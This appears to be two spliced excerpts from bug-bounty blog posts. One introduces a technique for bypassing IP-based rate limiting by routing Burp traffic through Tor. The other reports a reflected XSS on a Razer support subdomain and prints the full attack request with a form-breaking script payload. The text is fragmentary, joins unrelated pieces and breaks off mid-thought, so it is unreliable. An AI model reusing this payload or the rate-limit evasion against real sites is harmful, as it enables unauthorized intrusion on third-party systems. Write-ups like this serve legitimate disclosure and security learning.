Rate Limit definition
In computer networks, rate limiting is used to control the rate of requests sent or received by a network interface controller. It can be used to prevent DoS attacks and limit web scraping
some packages you can use to prevent Rate Limit Attacks these packages prevent based on source IP
Today I Will Publish one technique You Can Use To Bypass This kind of protection and earn some bounties
The first thing you need to install and configure Tor as a proxy in burp
This is a good reference to install and configure Tor in burp as…
First Of All thanks for reading my first write up in medium
My Name Is Mostafa I Am Working As information Security Engineer And My Part Time Doing Some Bug Hunting
I Found 2 Vulnerabilities In The Different Subdomains in Razer
The First One is reflected XSS in (http://drivers.razersupport.com)
When I Searching To XSS Looked To Refelected Params I Found CSRF Token Have Been reflected and Commented In HTML Response So This Is The First One I Just Close The Form Tag And Wrote XSS Payload And Has Been Executed
GET /index.php?_m=k2n4qnfei8t8yk2e7ua78c7m7dd41t.burpcollaborator.net&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131&_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131 → →”></form><h1><script>alert(document.domain)</script></h1> HTTP/1.1 Host: drivers.razersupport.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36…
Mostafa
Information Security Engineer And Bug Hunter
